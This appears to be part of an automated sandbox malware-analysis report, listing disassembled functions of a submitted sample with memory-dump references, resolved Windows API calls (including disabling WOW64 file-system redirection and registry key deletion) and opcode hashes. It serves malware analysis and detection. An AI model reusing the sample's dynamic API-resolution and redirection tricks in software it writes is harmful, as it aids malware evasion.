                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                  • API String ID: 2574300362-2819208100
                                                                                                                  • Opcode ID: 6a353bd264be592e567f5e0adfe925540f8bd954e8d07eb83f44374d8df36b88
                                                                                                                  • Instruction ID: c7fb66e3c9e98bd0db0679edddc5646e1153937ffb47c35f0b697294c29db418
                                                                                                                  • Opcode Fuzzy Hash: 6a353bd264be592e567f5e0adfe925540f8bd954e8d07eb83f44374d8df36b88
                                                                                                                  • Instruction Fuzzy Hash: BEE0B6B0B8A301AFDB205F63FD0DB553AA5BB29756F501425F20AF20B0CBBA6458CA14
                                                                                                                  Function 00E5AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                  • Opcode ID: 14bb0d8c69a897c6c171d2a1fd3e74afd835a161af9300e4e5c4e93de6b1d53b
                                                                                                                  • Instruction ID: 3c8318efb7205b22a71af6cfdfa08d57632cf68f988ce1b3958f1c31986ece0c
                                                                                                                  • Opcode Fuzzy Hash: 14bb0d8c69a897c6c171d2a1fd3e74afd835a161af9300e4e5c4e93de6b1d53b
                                                                                                                  • Instruction Fuzzy Hash: 96E012B180461CDBCB119790DD05DFAB3BDA704742F5869E2FD06B1050D6759B8CAB23
                                                                                                                  Function 00DFE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00DFE014,75920AE0,00DFDEF1,00E7DC38,?,?), ref: 00DFE02C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DFE03E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                  • Opcode ID: ea9a07e07b01b70d5fdf5d3ea982bec7b48b150499b85307dcaf00776c39e802
                                                                                                                  • Instruction ID: f31f06e8005c26e3ace12a7d9212334779018e358074af314a0459e5ce08755b
                                                                                                                  • Opcode Fuzzy Hash: ea9a07e07b01b70d5fdf5d3ea982bec7b48b150499b85307dcaf00776c39e802
                                                                                                                  • Instruction Fuzzy Hash: 5CD0A770906712EFCF324F62FC4862377D4AB01310F1D851DE581F2160DBF4C8848660
                                                                                                                  Function 00DE42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00DE42EC,?,00DE42AA,?), ref: 00DE4304
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DE4316
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                  • API String ID: 2574300362-1355242751
                                                                                                                  • Opcode ID: 05e40d500d6d77cbd6396ceb540720bfcf5ef1b7892f4fbc6526d74eadef4a3e
                                                                                                                  • Instruction ID: 0a10454fa42c7b8c4b2ac82cb2ccede517eb18542adcff4754edf1d048f38ab5
                                                                                                                  • Opcode Fuzzy Hash: 05e40d500d6d77cbd6396ceb540720bfcf5ef1b7892f4fbc6526d74eadef4a3e
                                                                                                                  • Instruction Fuzzy Hash: AFD0A734944712AFCB205F33FC0C60277D4AB06311B04441DE541F2264D7F0C8848620
                                                                                                                  Function 00E42205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00E421FB,?,00E423EF), ref: 00E42213
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00E42225
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                                                  • API String ID: 2574300362-399901964
                                                                                                                  • Opcode ID: 894b9a97d31e1025823aecf96c0d5277d9e3d53dacbcff13531e908e51db003c
                                                                                                                  • Instruction ID: 624f2784174529df4562a18d56eaf4e97b912f95c7f508f8a9f6f36738fe3c1e
                                                                                                                  • Opcode Fuzzy Hash: 894b9a97d31e1025823aecf96c0d5277d9e3d53dacbcff13531e908e51db003c
                                                                                                                  • Instruction Fuzzy Hash: 1FD0A7749047129FCB214F72FC0860277D5EB0A314B40641DF941F2160D7F0D884C660
                                                                                                                  Function 00DE434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00DE41BB,00DE4341,?,00DE422F,?,00DE41BB,?,?,?,?,00DE39FE,?,00000001), ref: 00DE4359
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DE436B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                  • API String ID: 2574300362-3689287502
                                                                                                                  • Opcode ID: 5f8b4c77202af623365fed3714398aa37f0ce05c66dd1c586b0988fcca184d22
                                                                                                                  • Instruction ID: 8dae4b426866a9bd9344182b277f18491d5c0fd02a10e1cc2d0fa2611a6cbbba
                                                                                                                  • Opcode Fuzzy Hash: 5f8b4c77202af623365fed3714398aa37f0ce05c66dd1c586b0988fcca184d22
                                                                                                                  • Instruction Fuzzy Hash: 39D0A730944712AFCB205F33FC0C60377D4AB11755B04851DE481F2250D7F0D8848630
                                                                                                                  Function 00E20564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00E2052F,?,00E206D7), ref: 00E20572
                                                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00E20584
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                  • API String ID: 2574300362-1587604923
                                                                                                                  • Opcode ID: 8659d72151fae64d0b00aa1eb2d100894fe59dac4125928111f80287d7378e0a
                                                                                                                  • Instruction ID: ba321a9ab32b51f673adf6b6ce1695a2cc3eb2943ed47cdad68fffb2beac6167
                                                                                                                  • Opcode Fuzzy Hash: 8659d72151fae64d0b00aa1eb2d100894fe59dac4125928111f80287d7378e0a
                                                                                                                  • Instruction Fuzzy Hash: 0FD05E30A45322AECF209F22BC08A0277E8AF05314B50951DE945B2190D7F0C4C48A20
                                                                                                                  Function 00E20539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,00E2051D,?,00E205FE), ref: 00E20547
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00E20559
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                  • API String ID: 2574300362-1071820185
                                                                                                                  • Opcode ID: 9dfea1fe06722e0bd0b808a75dd16543460deafc940a3f4f66703d9c2f691407
                                                                                                                  • Instruction ID: b8350c22e6d9b779304b1bb097dd57e784367e7e15cfb24d674f496fbc6efb9b
                                                                                                                  • Opcode Fuzzy Hash: 9dfea1fe06722e0bd0b808a75dd16543460deafc940a3f4f66703d9c2f691407
                                                                                                                  • Instruction Fuzzy Hash: E3D0A730A45722AFCF308F22FC0860277E4AB01315B50D41DE446F2191D6F0C8848A50
                                                                                                                  Function 00E3ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00E3ECBE,?,00E3EBBB), ref: 00E3ECD6
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E3ECE8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                  • Opcode ID: a97404a12dcc654a21ebdaf22458391c21906334870f65aa03e5d5426e43ad5a
                                                                                                                  • Instruction ID: 06899fba903f8e735b05c3c5d89ce11820c0803a3c06c8d523fa3cca17360f7a
                                                                                                                  • Opcode Fuzzy Hash: a97404a12dcc654a21ebdaf22458391c21906334870f65aa03e5d5426e43ad5a
                                                                                                                  • Instruction Fuzzy Hash: A5D05E70904723AFCF245B62AC48706BAE4AF01754F00A419E855B2290DAF0C885C710
                                                                                                                  Function 00E3BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00E3BAD3,00000001,00E3B6EE,?,00E7DC00), ref: 00E3BAEB
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E3BAFD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                  • API String ID: 2574300362-199464113
                                                                                                                  • Opcode ID: 7347f9b57851114590dc471484784c3faccc6c8803546e5e79d6fa4e30371b87
                                                                                                                  • Instruction ID: 749f111b5100abe58a36b8aa7f5aa028b745b1e1551de8a940d28e5a7165f670
                                                                                                                  • Opcode Fuzzy Hash: 7347f9b57851114590dc471484784c3faccc6c8803546e5e79d6fa4e30371b87
                                                                                                                  • Instruction Fuzzy Hash: 4FD05E70D047129FCB305F22BC48A12BAD4AB01354F005459E943B2154DBF0C884C610
                                                                                                                  Function 00E43BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00E43BD1,?,00E43E06), ref: 00E43BE9
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E43BFB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                  • Opcode ID: 77dd6941db18c28ffdb52c142d96c5da8d6956b7fbc45f220e6338f5e124415d
                                                                                                                  • Instruction ID: 2322ab2784ccc868d73132d987926353c6c93b749fd666b717d3fc5af8a0fc38
                                                                                                                  • Opcode Fuzzy Hash: 77dd6941db18c28ffdb52c142d96c5da8d6956b7fbc45f220e6338f5e124415d
                                                                                                                  • Instruction Fuzzy Hash: 74D0A7F09047129FCB205FB2FC48A03FAF8AB02328B205429E445F2191D6F0C4848E20
                                                                                                                  Function 00E19B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 34d443f6f3c88a76d38561ad77c2b60b218b20fdf2299c94e12430adf8141bf4
                                                                                                                  • Instruction ID: 82d90c063f78f843208fb53c1513eb06189447afe50280c2f6c4b2d0d26db218
                                                                                                                  • Opcode Fuzzy Hash: 34d443f6f3c88a76d38561ad77c2b60b218b20fdf2299c94e12430adf8141bf4
                                                                                                                  • Instruction Fuzzy Hash: E3C15D75A0021AEFCB14CFA4C894AEEB7B5FF48704F105598E956EB252D730DE81DB90
                                                                                                                  Function 00E3AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00E3AAB4
                                                                                                                  • CoUninitialize.COMBASE ref: 00E3AABF
                                                                                                                    • Part of subcall function 00E20213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00E2027B
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00E3AACA
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E3AD9D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 780911581-0
                                                                                                                  • Opcode ID: 7a28b1f7b5558bc3e3c7da67978f7e86df14428e2a2f95c43b55677644dd652d
                                                                                                                  • Instruction ID: 3eba861cbe89c6a167a3d6477e2a85db9355e6791f6c0d6d9377250d33f31516
                                                                                                                  • Opcode Fuzzy Hash: 7a28b1f7b5558bc3e3c7da67978f7e86df14428e2a2f95c43b55677644dd652d
                                                                                                                  • Instruction Fuzzy Hash: 99A16D352047019FC710EF15C495B6ABBE5FF48314F588459FA96AB3A2CB30ED44CBA6
                                                                                                                  Function 00E191CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2808897238-0
                                                                                                                  • Opcode ID: 71491af8b76f4de25785c85a677b9bc885cca877470e0d993602836ecec85210
